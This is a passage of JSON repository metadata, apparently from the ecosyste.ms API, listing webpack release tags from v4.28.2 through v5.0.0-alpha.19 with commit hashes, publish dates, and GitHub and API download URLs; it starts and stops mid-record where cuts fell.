0-alpha.19","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.19","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.19","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.19/manifests"},{"name":"v4.39.1","sha":"f29445d46624ef4726465e27bbe6e003aa07f8be","kind":"tag","published_at":"2019-08-02T12:35:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.39.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.39.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.39.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.1/manifests"},{"name":"v4.39.0","sha":"5344837ed67479b838ad07ff353919d41f5d2b9f","kind":"tag","published_at":"2019-08-01T15:30:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.39.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.0/manifests"},{"name":"v4.38.0","sha":"ae3db13d7db6dbcdc27f2f3095b532c60c9de1c9","kind":"tag","published_at":"2019-07-26T07:26:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.38.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.38.0/manifests"},{"name":"v4.37.0","sha":"04b0d6b4eaa0e18629998e28f795914291c34723","kind":"tag","published_at":"2019-07-23T09:34:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.37.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.37.0/manifests"},{"name":"v4.36.1","sha":"92caa5de066ded4232a119752bd5dde1497606ef","kind":"tag","published_at":"2019-07-17T13:58:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.36.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.36.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.36.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.36.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.36.1/manifests"},{"name":"v4.36.0","sha":"95d21bb39a1e700f28be776b300492c50a169fc7","kind":"tag","published_at":"2019-07-17T11:32:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.36.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.36.0/manifests"},{"name":"v5.0.0-alpha.18","sha":"9d05b680f02b7bdae81eff47a18f95d1f21ed053","kind":"tag","published_at":"2019-07-08T20:25:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.18","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.18","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.18","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.18","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.18/manifests"},{"name":"v4.35.3","sha":"4ec90ceba4206aeb91d4c0f7e12dc889d238001e","kind":"tag","published_at":"2019-07-08T13:53:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.35.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.35.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.35.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.3/manifests"},{"name":"v5.0.0-alpha.17","sha":"7ade38d01107be2f55277b61fb683341884cdc7c","kind":"tag","published_at":"2019-07-01T10:22:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.17","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.17","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.17","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.17","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.17/manifests"},{"name":"v4.35.2","sha":"bf3e869a423a60581dcb64e215b8d14403e997f2","kind":"tag","published_at":"2019-07-01T09:18:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.35.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.35.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.35.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.2/manifests"},{"name":"v4.35.1","sha":"569dd6a2d2e31f218578c79a4b25dfe61baf6c08","kind":"tag","published_at":"2019-07-01T09:07:01.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.35.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.35.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.35.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.1/manifests"},{"name":"v4.35.0","sha":"c3377ef76ec708ed9c55314e8386f438abea178c","kind":"tag","published_at":"2019-06-19T19:15:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.35.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.0/manifests"},{"name":"v5.0.0-alpha.16","sha":"56b8aa7006df3c7c9d6634dd11fc6a9f5bac9644","kind":"tag","published_at":"2019-06-14T13:25:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.16","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.16","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.16","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.16","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.16/manifests"},{"name":"v4.34.0","sha":"34c86675728430c0f41fe415dbbacf87b5a2875d","kind":"tag","published_at":"2019-06-12T23:10:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.34.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.34.0/manifests"},{"name":"v5.0.0-alpha.15","sha":"224daec09d68f17ef705eafc9ecafeb3fa7fd7a9","kind":"tag","published_at":"2019-06-05T16:38:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.15","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.15/manifests"},{"name":"v4.33.0","sha":"d45bec3518f53153287ff2cad3cfae9d2b248d9a","kind":"tag","published_at":"2019-06-04T19:32:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.33.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.33.0/manifests"},{"name":"v5.0.0-alpha.14","sha":"0037e7355a147cf0fe8df9c56f1b9515b1a87f88","kind":"tag","published_at":"2019-05-23T07:32:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.14","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.14/manifests"},{"name":"v4.32.2","sha":"5d3004cccd3dd5af2721c39a7a8a27b12b3d0c19","kind":"tag","published_at":"2019-05-22T23:11:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.32.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.32.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.32.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.32.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.32.2/manifests"},{"name":"v4.32.1","sha":"87fc33edbec46f721a2186194f2bc0c8fc14b464","kind":"tag","published_at":"2019-05-22T06:30:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.32.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.32.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.32.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.32.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.32.1/manifests"},{"name":"v5.0.0-alpha.13","sha":"8d05c28e9c679f77cd054a84e261525773092b06","kind":"tag","published_at":"2019-05-20T12:55:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.13","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.13/manifests"},{"name":"v4.32.0","sha":"bbe71d89cb7a8c1cc81ce1e17929d8de2260ff80","kind":"tag","published_at":"2019-05-20T09:53:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.32.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.32.0/manifests"},{"name":"v5.0.0-alpha.12","sha":"e72fed4877c59d6d842a3596328c6e045d2b5eca","kind":"tag","published_at":"2019-05-10T22:40:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.12","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.12/manifests"},{"name":"v4.31.0","sha":"2e1e1799b1fc56b68dbddbe8712ff6393654ccbd","kind":"tag","published_at":"2019-05-09T07:56:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.31.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.31.0/manifests"},{"name":"v4.30.0","sha":"b72b96a2bc5d2c7a308d0943567e0db191d3c358","kind":"tag","published_at":"2019-04-12T20:06:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.30.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.30.0/manifests"},{"name":"v4.29.6","sha":"685a0626cb10664133ef2fb2e2f9f4cb3971402a","kind":"tag","published_at":"2019-02-28T09:44:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.6","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.6/manifests"},{"name":"v5.0.0-alpha.11","sha":"589e4e4d9d42401d638c442e5b83bb28213b614a","kind":"tag","published_at":"2019-02-19T10:50:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.11","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.11/manifests"},{"name":"v4.29.5","sha":"073813f1913e000302be557272b2d11195f9c2e6","kind":"tag","published_at":"2019-02-18T10:05:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.5","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.5/manifests"},{"name":"v4.29.4","sha":"7ecf992bd97204fbfaeed18e3e21fb9fcd46352f","kind":"tag","published_at":"2019-02-15T15:10:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.4","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.4/manifests"},{"name":"v5.0.0-alpha.10","sha":"2d7338d2b5cc70c6bd250a878d8a9717cc02cb95","kind":"tag","published_at":"2019-02-07T08:49:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.10","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.10/manifests"},{"name":"v4.29.3","sha":"b934e26da8b65bdf36b3c71141d0c2d8397d9f44","kind":"tag","published_at":"2019-02-07T08:22:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.3/manifests"},{"name":"v4.29.2","sha":"74b8aac0adfb0c79d70a99fa86635930db8944fd","kind":"tag","published_at":"2019-02-06T14:05:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.2/manifests"},{"name":"v4.29.1","sha":"6934b9814492b049e67efb3ccf7254d8917e01f9","kind":"tag","published_at":"2019-02-04T17:01:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.1/manifests"},{"name":"v5.0.0-alpha.9","sha":"92a36b1a9c0ed554c0f7e74bf1bc98c77a768fcc","kind":"tag","published_at":"2019-01-27T12:18:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.9","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.9/manifests"},{"name":"v4.29.0","sha":"25bccd4c487a5bf743efc62947d81a8eaa81a90f","kind":"tag","published_at":"2019-01-20T17:38:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.0/manifests"},{"name":"v5.0.0-alpha.8","sha":"adff7f61a2595ea9a04c0f3070add21be01607fb","kind":"tag","published_at":"2019-01-19T19:24:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.8","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.8/manifests"},{"name":"v5.0.0-alpha.7","sha":"18aca2fcb148d04ba3d0b37742f50534d42a7ec3","kind":"tag","published_at":"2019-01-19T12:11:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.7","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.7/manifests"},{"name":"v5.0.0-alpha.6","sha":"4be6797700753a54b223600f01e941580b6a6ba3","kind":"tag","published_at":"2019-01-15T16:39:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.6","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.6/manifests"},{"name":"v4.28.4","sha":"fdb6b139b94273e5b18870262c193a93f65132e8","kind":"tag","published_at":"2019-01-10T15:48:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.28.4","html_url":"https://github.com/webpack/webpack/releases/tag/v4.28.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.28.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.4/manifests"},{"name":"v5.0.0-alpha.5","sha":"0d9ed482bc39fb23040ffd26823e0b7ed73320cb","kind":"tag","published_at":"2019-01-09T14:20:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.5","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.5/manifests"},{"name":"v5.0.0-alpha.4","sha":"b97bc4bc062cd5395de8b00115519472645d57d0","kind":"tag","published_at":"2019-01-08T14:09:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.4/manifests"},{"name":"v5.0.0-alpha.3","sha":"762155dc2da6795dfe72a5cbeb632fc42c9c49e0","kind":"tag","published_at":"2018-12-29T17:13:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.3/manifests"},{"name":"v4.28.3","sha":"983c2616ec1b869bfb659b6331bd2fe2abc66e23","kind":"tag","published_at":"2018-12-29T11:55:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.28.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.28.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.28.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.3/manifests"},{"name":"v5.0.0-alpha.2","sha":"88f0e18e64c7935723348de3b7dd1aa92050999c","kind":"tag","published_at":"2018-12-26T10:33:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.2/manifests"},{"name":"v5.0.0-alpha.1","sha":"90a0866efcd35401353c9e8d5c904fe2cd407f7e","kind":"tag","published_at":"2018-12-23T20:24:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.1/manifests"},{"name":"v4.28.2","sha":"fe514dd975f1d2dd1546906a6f4c0a6b2a0e3761","kind":"tag","published_at":"2018-12-22T12:53:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.28.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.28.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.28.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/G